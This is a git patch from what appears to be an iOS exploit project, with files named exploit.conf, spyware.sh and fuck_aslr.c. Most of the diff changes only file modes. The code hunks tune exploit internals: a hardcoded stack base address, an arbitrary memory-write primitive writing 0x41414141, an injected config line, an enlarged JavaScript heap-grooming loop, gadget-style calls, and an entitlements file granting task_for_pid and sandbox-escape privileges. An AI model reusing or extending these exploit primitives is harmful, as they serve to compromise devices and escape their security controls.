From 3dea872119219789ff85daef37f059eefc709871 Mon Sep 17 00:00:00 2001 From: spv420 Date: Sat, 23 Apr 2022 16:23:39 -0400 Subject: shitdick --- build.sh | 0 build_native.sh | 0 exploit.conf | 0 install.sh | 0 install_native.sh | 0 js/main.js | 2 +- spyware.sh | 0 src/common.h | 0 src/ip_tools.c | 0 src/ip_tools.h | 0 src/main.c | 11 +++++++---- src/patchfinder.h | 0 src/stage0_primitives.c | 0 src/stage0_primitives.h | 0 src/stage1_primitives.c | 0 src/stage1_primitives.h | 0 tools/build.sh | 0 tools/ent.xml | 28 ++++++++++++++-------------- tools/fuck_aslr.c | 0 tools/fuck_ptr.c | 0 tools/jit_all_the_things.c | 0 tools/test.c | 0 22 files changed, 22 insertions(+), 19 deletions(-) mode change 100755 => 100644 build.sh mode change 100755 => 100644 build_native.sh mode change 100755 => 100644 exploit.conf mode change 100755 => 100644 install.sh mode change 100755 => 100644 install_native.sh mode change 100755 => 100644 spyware.sh mode change 100755 => 100644 src/common.h mode change 100755 => 100644 src/ip_tools.c mode change 100755 => 100644 src/ip_tools.h mode change 100755 => 100644 src/patchfinder.h mode change 100755 => 100644 src/stage0_primitives.c mode change 100755 => 100644 src/stage0_primitives.h mode change 100755 => 100644 src/stage1_primitives.c mode change 100755 => 100644 src/stage1_primitives.h mode change 100755 => 100644 tools/build.sh mode change 100755 => 100644 tools/ent.xml mode change 100755 => 100644 tools/fuck_aslr.c mode change 100755 => 100644 tools/fuck_ptr.c mode change 100755 => 100644 tools/jit_all_the_things.c mode change 100755 => 100644 tools/test.c diff --git a/build.sh b/build.sh old mode 100755 new mode 100644 diff --git a/build_native.sh b/build_native.sh old mode 100755 new mode 100644 diff --git a/exploit.conf b/exploit.conf old mode 100755 new mode 100644 diff --git a/install.sh b/install.sh old mode 100755 new mode 100644 diff --git a/install_native.sh b/install_native.sh old mode 100755 new mode 100644 diff --git a/js/main.js b/js/main.js index b75af4e..7f1e78e 100644 --- a/js/main.js +++ b/js/main.js @@ -69,7 +69,7 @@ function main() { // call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, slide); // call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 1, 0x1, 0x2, 0x3); calls4arg("syslog\0", 0x28, sptr("get rekt from jsc %d (slide=%x)\n\0"), i, 0); - calls4arg("sleep", 1, 0, 0, 0); +// calls4arg("sleep", 1, 0, 0, 0); i++; // call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x148000, i, 0x2, 0x3); } diff --git a/spyware.sh b/spyware.sh old mode 100755 new mode 100644 diff --git a/src/common.h b/src/common.h old mode 100755 new mode 100644 diff --git a/src/ip_tools.c b/src/ip_tools.c old mode 100755 new mode 100644 diff --git a/src/ip_tools.h b/src/ip_tools.h old mode 100755 new mode 100644 diff --git a/src/main.c b/src/main.c index 124affa..3c8d513 100644 --- a/src/main.c +++ b/src/main.c @@ -202,11 +202,11 @@ int main(int argc, fprintf(fp, "# - with love from spv <3\n"); fprintf(fp, "\n"); -// uint32_t stack_base = 0x1c7738; // my shell setup + uint32_t stack_base = 0x1c7738; // my shell setup // uint32_t stack_base = 0x1c7c88; // my 4s shell setup // uint32_t stack_base = 0x1c2e48; // my lldb // uint32_t stack_base = 0x1c7d68; // btserver env - uint32_t stack_base = 0x1c7dd8; // wifiFirmwareLoader env +// uint32_t stack_base = 0x1c7dd8; // wifiFirmwareLoader env uint32_t magic_trigger_addr = 0xb6074; uint32_t mov_r0_0_bx_lr = 0x8d3e | 1; @@ -286,6 +286,9 @@ int main(int argc, 0x42424242)); #endif + fprintf(fp, "%s\n", write32_unslid(stack_base - 0x948, 0x41414141)); + fprintf(fp, "mode_cfg{dns41.1.1.1;}"); + #if 0 // fprintf(fp, // "%s\n", @@ -334,7 +337,7 @@ int main(int argc, "var parent = new Uint8Array(0x100);" "var child = new Uint8Array(0x100);" " var fuck = new Array();" - " for (var i = 0; i < 0x10000; i++) {" + " for (var i = 0; i < 0x200000; i++) {" " fuck[i] = i;" " }" " delete fuck;" @@ -343,7 +346,7 @@ int main(int argc, strlen("var parent = new Uint8Array(0x100);" "var child = new Uint8Array(0x100);" " var fuck = new Array();" - " for (var i = 0; i < 0x10000; i++) {" + " for (var i = 0; i < 0x200000; i++) {" " fuck[i] = i;" " }" " delete fuck;" diff --git a/src/patchfinder.h b/src/patchfinder.h old mode 100755 new mode 100644 diff --git a/src/stage0_primitives.c b/src/stage0_primitives.c old mode 100755 new mode 100644 diff --git a/src/stage0_primitives.h b/src/stage0_primitives.h old mode 100755 new mode 100644 diff --git a/src/stage1_primitives.c b/src/stage1_primitives.c old mode 100755 new mode 100644 diff --git a/src/stage1_primitives.h b/src/stage1_primitives.h old mode 100755 new mode 100644 diff --git a/tools/build.sh b/tools/build.sh old mode 100755 new mode 100644 diff --git a/tools/ent.xml b/tools/ent.xml old mode 100755 new mode 100644 index 35801e8..2973d1d --- a/tools/ent.xml +++ b/tools/ent.xml @@ -1,15 +1,15 @@ - - - - platform-application - - com.apple.private.security.no-container - - com.apple.system-task-ports - - task_for_pid-allow - - get-task-allow - - + + + + platform-application + + com.apple.private.security.no-container + + com.apple.system-task-ports + + task_for_pid-allow + + get-task-allow + + \ No newline at end of file diff --git a/tools/fuck_aslr.c b/tools/fuck_aslr.c old mode 100755 new mode 100644 diff --git a/tools/fuck_ptr.c b/tools/fuck_ptr.c old mode 100755 new mode 100644 diff --git a/tools/jit_all_the_things.c b/tools/jit_all_the_things.c old mode 100755 new mode 100644 diff --git a/tools/test.c b/tools/test.c old mode 100755 new mode 100644 -- cgit v1.2.3